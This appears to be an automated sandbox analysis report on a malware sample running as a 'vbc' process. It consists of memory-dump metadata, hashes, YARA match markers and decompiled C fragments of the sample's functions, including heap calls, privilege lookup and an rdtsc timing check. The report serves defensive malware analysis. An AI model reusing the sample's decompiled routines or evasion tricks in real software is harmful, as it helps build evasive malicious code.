                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                     • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp
                                                     • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E004088E0(intOrPtr* _a4) {
                                                    				intOrPtr _v8;
                                                    				char _v24;
                                                    				char _v284;
                                                    				char _v804;
                                                    				char _v840;
                                                    				void* _t24;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    				void* _t34;
                                                    				void* _t39;
                                                    				void* _t50;
                                                    				intOrPtr* _t52;
                                                    				void* _t53;
                                                    				void* _t54;
                                                    				void* _t55;
                                                    				void* _t56;
                                                    
                                                    				_t52 = _a4;
                                                    				_t39 = 0; // executed
                                                    				_t24 = E00406E30(_t52,  &_v24); // executed
                                                    				_t54 = _t53 + 8;
                                                    				if(_t24 != 0) {
                                                    					E00407040( &_v24,  &_v840);
                                                    					_t55 = _t54 + 8;
                                                    					do {
                                                    						E0041A110( &_v284, 0x104);
                                                    						E0041A780( &_v284,  &_v804);
                                                    						_t56 = _t55 + 0x10;
                                                    						_t50 = 0x4f;
                                                    						while(1) {
                                                    							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                                                    							_t56 = _t56 + 0x10;
                                                    							if(_t31 != 0) {
                                                    								break;
                                                    							}
                                                    							_t50 = _t50 + 1;
                                                    							if(_t50 <= 0x62) {
                                                    								continue;
                                                    							} else {
                                                    							}
                                                    							goto L8;
                                                    						}
                                                    						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                    						_t39 = 1;
                                                    						L8:
                                                    						_t33 = E00407070( &_v24,  &_v840);
                                                    						_t55 = _t56 + 8;
                                                    					} while (_t33 != 0 && _t39 == 0);
                                                    					_t34 = E004070F0(_t52,  &_v24); // executed
                                                    					if(_t39 == 0) {
                                                    						asm("rdtsc");
                                                    						asm("rdtsc");
                                                    						_v8 = _t34 - 0 + _t34;
                                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                    					}
                                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                    					return 1;
                                                    				} else {
                                                    					return _t24;
                                                    				}
                                                    			}
                                                    0x004088eb
                                                    0x004088f3
                                                    0x004088f5
                                                    0x004088fa
                                                    0x004088ff
                                                    0x00408912
                                                    0x00408917
                                                    0x00408920
                                                    0x0040892c
                                                    0x0040893f
                                                    0x00408944
                                                    0x00408947
                                                    0x00408950
                                                    0x00408962
                                                    0x00408967
                                                    0x0040896c
                                                    0x00000000
                                                    0x00000000
                                                    0x0040896e
                                                    0x00408972
                                                    0x00000000
                                                    0x00000000
                                                    0x00408974
                                                    0x00000000
                                                    0x00408972
                                                    0x00408976
                                                    0x00408979
                                                    0x0040897f
                                                    0x00408981
                                                    0x0040898c
                                                    0x00408991
                                                    0x00408994
                                                    0x004089a1
                                                    0x004089ac
                                                    0x004089ae
                                                    0x004089b4
                                                    0x004089b8
                                                    0x004089bb
                                                    0x004089bb
                                                    0x004089c2
                                                    0x004089c5
                                                    0x004089ca
                                                    0x004089d7
                                                    0x00408906
                                                    0x00408906
                                                    0x00408906

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36f28137c473b1d7800f4614c9ffc2b53779ab02a0ac0278687683c51d908026
                                                    • Instruction ID: b342730474dcc0ac064d0d011e1d56cf5cdba0abec35914909fd77f498fa833d
                                                    • Opcode Fuzzy Hash: 36f28137c473b1d7800f4614c9ffc2b53779ab02a0ac0278687683c51d908026
                                                    • Instruction Fuzzy Hash: 7B21F8B2D4420957CB15E6649E42AFF73AC9B50308F04057FE989A2181F639AB498BA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 9 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                                                    C-Code - Quality: 100%
                                                    			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                    				void* _t10;
                                                    				void* _t15;
                                                    
                                                    				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                    				_t6 =  &_a8; // 0x413546
                                                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: F5A
                                                    • API String ID: 1279760036-683449296
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 207 418a53-418a56 208 418a58-418a5f 207->208 209 4189dd-418a04 call 4191f0 207->209 213 418a61-418a7a call 4191f0 208->213 214 418ab6-418ad0 call 4191f0 208->214 218 418a7f-418a94 LookupPrivilegeValueW 213->218
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 3dc2804c8d3f560f634078950f3a49578d8e791d7f953987e56eaa330a886b04
                                                    • Instruction ID: 0f8594f11b6001affc0ce341d4f6987dd6900938bc816262d1bd862569b70fbd
                                                    • Opcode Fuzzy Hash: 3dc2804c8d3f560f634078950f3a49578d8e791d7f953987e56eaa330a886b04
                                                    • Instruction Fuzzy Hash: C51170B52402486FDB14EFA9DC85EEB3768EF84354F01855AFD086B242C934E954C7F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 222 407290-4072da call 41a160 call 41ad40 call 409b50 call 413e60 231 4072dc-4072ee PostThreadMessageW 222->231 232 40730e-407312 222->232 233 4072f0-40730a call 4092b0 231->233 234 40730d 231->234 233->234 234->232
                                                    C-Code - Quality: 82%
                                                    			E00407290(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                                    				char _v67;
                                                    				char _v68;
                                                    				void* __esi;
                                                    				void* _t12;
                                                    				intOrPtr* _t13;
                                                    				int _t14;
                                                    				void* _t20;
                                                    				long _t23;
                                                    				void* _t25;
                                                    				intOrPtr* _t28;
                                                    				void* _t29;
                                                    				void* _t33;
                                                    
                                                    				_t33 = __eflags;
                                                    				_t20 = __edx;
                                                    				_v68 = 0;
                                                    				E0041AD40(E0041A160( &_v67, 0, 0x3f), _t20, _t25,  &_v68);
                                                    				_t12 = E00409B50(__ebx, _t33, _a4 + 0x1c,  &_v68); // executed
                                                    				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6, 3);
                                                    				_t28 = _t13;
                                                    				if(_t28 != 0) {
                                                    					_t23 = _a8;
                                                    					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                                    					_t35 = _t14;
                                                    					if(_t14 == 0) {
                                                    						_t14 =  *_t28(_t23, 0x8003, _t29 + (E004092B0(_t35, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                    					}
                                                    					return _t14;
                                                    				}
                                                    				return _t13;
                                                    			}

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
                                                    • Instruction ID: 4250000cacc114d134f5be589493d0900fd96f71ac8f672bcf1e10d74895a7a9
                                                    • Opcode Fuzzy Hash: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
                                                    • Instruction Fuzzy Hash: F6018431A8022876E721A6959C03FFF776C5B00B55F04415AFF04BA1C2E6E8790586FA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 264 4188f4-418917 call 4191f0 266 41891c-418931 RtlFreeHeap 264->266
                                                    C-Code - Quality: 82%
                                                    			E004188F4(void* __eax, void* __ebx, void* _a4, long _a8, void* _a12) {
                                                    				intOrPtr _v0;
                                                    				char _t14;
                                                    				void* _t21;
                                                    				char _t25;
                                                    
                                                    				 *0x53b9b92f = _t25;
                                                    				asm("arpl [ebx-0x741374ab], cx");
                                                    				_t11 = _v0;
                                                    				_t5 = _t11 + 0xc74; // 0xc74
                                                    				E004191F0(_t21, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                    				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                    				return _t14;
                                                    			}

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 40e16d1b84d617deca3832357b05040c91571bd3a26d620df365af6c4f8e3855
                                                    • Instruction ID: 5e0cb83e5d5d92db5aa6902efd79b6b48365383cfded167720f4880b0219a777
                                                    • Opcode Fuzzy Hash: 40e16d1b84d617deca3832357b05040c91571bd3a26d620df365af6c4f8e3855
                                                    • Instruction Fuzzy Hash: DCE068B41542C49BEB00FF79C8C089B3BA4FF46214B14859EE88847203C131D459CB70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 267 418900-418916 268 41891c-418931 RtlFreeHeap 267->268 269 418917 call 4191f0 267->269 269->268
                                                    C-Code - Quality: 100%
                                                    			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                    				char _t10;
                                                    				void* _t15;
                                                    
                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                    				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 270 418a60-418a79 271 418a7f-418a94 LookupPrivilegeValueW 270->271 272 418a7a call 4191f0 270->272 272->271
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E00418933(intOrPtr _a4, int _a8) {
                                                    				void* _t12;
                                                    				intOrPtr _t13;
                                                    				void* _t18;
                                                    
                                                    				asm("das");
                                                    				asm("cli");
                                                    				 *((intOrPtr*)(_t12 + 0x2f)) = _t13;
                                                    				asm("cdq");
                                                    				asm("aas");
                                                    				_t9 = _a4;
                                                    				E004191F0(_t18, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
                                                    				ExitProcess(_a8);
                                                    			}

                                                    APIs
                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
